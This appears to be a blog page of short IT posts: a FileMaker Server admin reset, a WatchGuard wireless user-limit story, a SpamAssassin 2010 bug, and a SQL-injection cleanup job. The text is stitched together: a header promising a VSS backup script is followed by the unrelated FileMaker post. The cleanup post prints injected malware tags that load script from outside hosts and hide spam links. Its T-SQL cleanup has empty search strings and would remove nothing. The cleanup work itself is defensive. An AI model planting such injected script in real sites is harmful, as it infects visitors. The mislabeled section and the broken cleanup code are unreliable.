This article first appeared at the now-closed Win32Scripting site. Since I find it useful, and my bookmark no longer works, I have been unable to reach its author, Jeff Trumbull, so I hope he doesn't mind that I've archived it.

Author: Jeff Trumbull

Description:
Backup files that make a Microsoft virtual server with only about 1 minute of down time. Suspends the virtual server, takes a shadow copy , starts the virtual server then copies virtual server files. This could be used to copy any open files. Requires vshadow.exe from vss sdk.

Script:

Long story short, you can't... at least not thru the interface. Instead, you need to totally blow out your configuration and reconfigure the server.

However, it's not as bad as it seems - there's not so much to configure that it should be too big of a hassle.

If you have console access, close your databases, and make note of your settings.

• Stop the Filemaker Service.
• Assuming a default installation, go to c:\program files\filemaker\filemaker server\admin\conf and delete the 4 XML files in there.
• Restart the Filemaker Service
• Reconnect to the Filemaker Console

It'll re-walk you thru the wizard to set up the server, and the first thing you do is set up a username and password. Your databases (again, assuming a default installation) will already be there, ready to go...

Got a call from a client today who was unable to get his laptop to connect to his wireless network.

The client has a standard Linksys WRT54G which is sitting behind a WatchGuard SOHO router.  (The WatchGuard predated my involvement with the client, and we determined it was easier to use the WRT54G as an access point rather than ripping out the WatchGuard...)

Upon inspection, the laptop WAS connecting to the wireless network, it just didn't have internet access.  Vista would show it had Internet connectivity, but it would then just go away.

Upgraded the WRT54g's firmware, same result.  Changed from WEP to WPA-2. Same result.

Reviewed the logs on the WatchGuard and saw "User count exceeded. Packet dropped."

A-HA!

The WatchGuard, unlike most consumer routers, has a user limit to it.  It keeps track of 10 IPs and when IP number 11 hits the routing table, it gets whacked with a big ole' DENY rule.

When I plugged the laptop into the WRT54g via ethernet cable, the IP address was one of the 10 in the routing table and packets were allowed to flow.  The IP address assigned to the wireless interface was not in the table and therefore blocked.

We couldn't figure out why the laptop stopped working.  The client mentioned the laptop stopped working when we put a new computer on the floor.  We did a quick count of all devices on the network and only came up with 7...

Just as I was leaving, one of the warehouse guys came in holding his iPhone asking "Did something happen to the wireless network?"

Of course, something had -- I hadn't changed the Linksys back to WEP after the WPA-2 experiment, and he lost his connection... and the mystery of the additional devices was solved.

So, the moral is two-fold -- look for user licensing restrictions where you least expect them, and someone else's handheld device from home sitting on your network might have a negative impact on your ability to get work done.

Just a quick heads up, but Spam Assassin (which we use for filtering here at Jephens) has a mis-formed filtering rule which considers 2010 to be a "grossly in the future" and therefore can't be a valid date.

This might have been true in Y2K, but in 2010, we're not so gross.

If you use ESVA like we do, there's a simple enough fix which is outlined in the ESVA Forums.

Otherwise, you'll need to fix your local.cf rules or edit the 72_active.cf file.

Further details can be found at Mike Cardwell's blog: SpamAssassin 2010 bug.

Got a call today off our previous article in this series from Branden of Hot Media Group, Inc., aChicago-based web application development, networking, and graphic design firm who found himself with a database full of malware infections, but the characteristics of his attack didn't match what we had written about, so he called us up. We reviewed his symptoms and were able to tweak the code we provided previously to work with this new set of issues.

We weren't able to see how the site was attacked, nor did we worry about how the site would be steeled against future occurrence (always use stored procedures and/or parametrized queries, kids!) -- this was purely a cleanup job.

This is the code we had:

DECLARE @T VARCHAR(255),@C VARCHAR(255)
DECLARE Table_Cursor CURSOR FOR
SELECT a.name,b.name FROM sysobjects a,syscolumns b WHERE a.id=b.id AND a.xtype='u' AND (b.xtype=35 OR b.xtype=231 OR b.xtype=167)
OPEN Table_Cursor
FETCH NEXT FROM Table_Cursor INTO @T,@C
WHILE(@@FETCH_STATUS=0)
BEGIN
PRINT ('UPDATE ['+@T+'] SET ['+@C+']=REPLACE(['+@C+'],'''', '''')') FETCH NEXT FROM Table_Cursor INTO @T,@C END CLOSE Table_Cursor DEALLOCATE Table_Cursor DECLARE Table_Cursor CURSOR FOR SELECT a.name,b.name FROM sysobjects a,syscolumns b WHERE a.id=b.id AND a.xtype='u' AND b.xtype=99 OPEN Table_Cursor FETCH NEXT FROM Table_Cursor INTO @T,@C WHILE(@@FETCH_STATUS=0) BEGIN PRINT ('UPDATE ['+@T+'] SET ['+@C+']=cast(replace(cast(['+@C+'] as nvarchar(4000)),'''','''') as ntext)')
FETCH NEXT FROM Table_Cursor INTO @T,@C
END
CLOSE Table_Cursor
DEALLOCATE Table_Cursor

And that worked fine, but it had some shortcomings -- mostly it only stripped out a single bit of invasive code, and our new friend had quite a bit of code to deal with, so instead of the almost quaint looking malware code:

<script src="hxxp://evilsite.evl/b.js"></script>

We had this jumble of code in every ntext field in his database:

<script type='text/javascript' src='http://google-anallytics.bad/urchin.js'></script>
<div style='display:none;'><a href='http://tests4all.bad/1/'>journals on losing post-pregnancy weight</a>
<a href='http://tests4all.bad/2/'>personal trainer certification atlanta</a>
<a href='http://tests4all.bad/3/'>quit smoking water vapor rings</a>
<a href='http://tests4all.bad/4/'>eyes in the darkness</a>
<a href='http://tests4all.bad/5/'>cheated map on dota 6.54b</a>
<a href='http://tests4all.bad/6/'>occupations for bored teen boys</a>
<a href='http://tests4all.bad/7/'>cgw southeast partners ilp</a>
<a href='http://tests4all.bad/8/'>does iq tests accurately measure intelligence</a>
<a href='http://tests4all.bad/9/'>free total psychic reading</a>
<a href='http://tests4all.bad/10/'>minnesota past life regression</a>
<a href='http://tests4all.bad/11/'>date of abraham lincolns death</a>

After trying to figure out the best way to escape all the single quotes, Branden -- an accomplished ColdFusion developer -- suggests "why don't we just drop everything to the right of the <script> tag?"
Read the rest of this entry »